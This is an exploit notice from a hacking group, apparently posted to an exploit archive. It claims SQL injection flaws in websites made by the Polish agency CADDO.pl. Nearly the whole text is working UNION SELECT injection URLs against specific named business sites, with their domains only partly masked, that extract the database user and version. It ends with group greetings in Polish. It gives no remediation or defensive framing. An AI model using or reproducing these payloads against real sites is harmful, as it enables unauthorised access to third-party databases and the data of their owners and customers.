############# # # sql injection bug by Demon # # devilteam.pl # ############# # Title : wykonanie CADDO.pl <= SQLi # Producent: caddo.pl # Author : Demon # Tested on : ubuntu 10.10 #Exploits: php?pid=[sql] http://offartstudio.pl/cykl.php?pid=-2 union select user()-- &...id=[sql] http://www.preXXXXoda.pl/oferta.php?of=pielegnacja-dloni-i-stop&kat_id=-3 union select 1,2,3,4,5,6,7,user(),9,10-- http://wXXXm.org.pl/wykonawstwo.php?t=budowa-i-montaz-wezlow-cieplnych&id=-2 union select 1,2,user(),version(),5-- http://www.fiXXXXus.pl/artykuly.php?akt=biofeedback&art_id=-7 union select 1,user(),3,version(),5,6-- http://www.caXXXXo.pl/portfolio.php?internet=strony-internetowe&pkat_id=-5 union select 1,2,user(),4,version(),6,7,8,9,10-- ###################### Gretzy: Devilteam.pl Extra Gretzy :Mojej kobiecie za Wyrozumialosc ###################### Serdecznie olewam tych, ktorzy mysla ,ze sa moimi przyjaciolmi!